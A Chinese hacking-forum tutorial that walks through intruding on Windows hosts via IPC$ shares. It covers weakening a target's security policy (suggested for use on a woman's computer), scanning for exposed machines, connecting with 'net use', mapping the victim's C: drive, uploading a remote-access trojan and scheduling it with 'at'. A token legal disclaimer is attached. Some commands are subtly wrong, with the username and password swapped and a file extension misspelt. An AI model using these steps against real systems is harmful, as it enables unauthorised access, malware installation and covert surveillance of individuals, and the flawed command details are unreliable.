请选择 进入手机版 | 继续访问电脑版

女黑客安全网-零基础入门网络安全学习-渗透测试零基础入门学习

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 268|回复: 0

在对方电脑建立IPC连接, 利用IPC$入侵 执行木马

[复制链接]

130

主题

145

帖子

1161

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
1161
发表于 2019-9-2 01:19:29 | 显示全部楼层 |阅读模式
第一大步:  IPC漏洞的建立
1)在目标主机上设置组策略:开始->运行-〉gpedit.msc
2)计算机配置->windows配置-〉本地策略-〉安全选项
3)在安全选项中,
将网络访问:本地账户的共享和安全模式 设置为:经典——本地用户以自己的身份验证;将账户:使用空白密码的本地账户只允许进行控制台登录设置为 禁用。
这样就建立了IPC漏洞。

如果你能接触到目标主机的话, 然后你懂的, 只要在你女神主机上开了这个小漏洞就好了!!!!!
如果你接触不到的话,就去网上探测一些存在IPC漏洞的主机玩玩,利用一些探测工具,找到后进行以下的操作!
第二大步:IPC漏洞的利用
以下为在本机上操作
1 连接对方主机:
截图201909011721093408..png
注意 如果你是从网上扫到的具有IPC漏洞的主机,可能会有用户名和密码 需要以下方法与目标主机建立IPC$连接
net use \\IP\ipc$ "用户名" /user:"密码"      ( 有3个空格)
2将目标主机的C:盘映射为本地主机上的Z:盘
截图201909011721235870..png
注意  Z盘不要与其它盘名重复  是随意明名的 可以不用Z  且 空格不要搞错
显示Z盘信息如下
截图201909011721442432..png

3 双击打开Z盘 传入木马   木马就自己配置生成了 网上很多 比如 ghost远控 灰鸽子什么的  请自重不要做犯法的事情
截图201909011721556309..png

4此时,目标主机的C盘中已存在ghost远控的muma.exe程序,使用Dos命令添加启动事件
首先查询对方主机目前时间

添加启动事件:
at \\10.1.11.126 11:11 c:\muma.ext

5 断开连接

键入“net use * /del”命令断开所有IPC$连接,总结:

就这么简单, 但是大家千万不要做坏事,本篇博客仅作学习研究计算机安全知识,如若用于其它用途,或去用了做坏事,后果自负额,转载请注明

by hnust_xiehonghao


必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网-零基础入门网络安全学习-渗透测试零基础入门学习 ( 津ICP备17008032号-3 )版权所有:一极(天津)安全技术服务有限公司

GMT+8, 2019-9-21 17:30 , Processed in 0.029923 second(s), 31 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表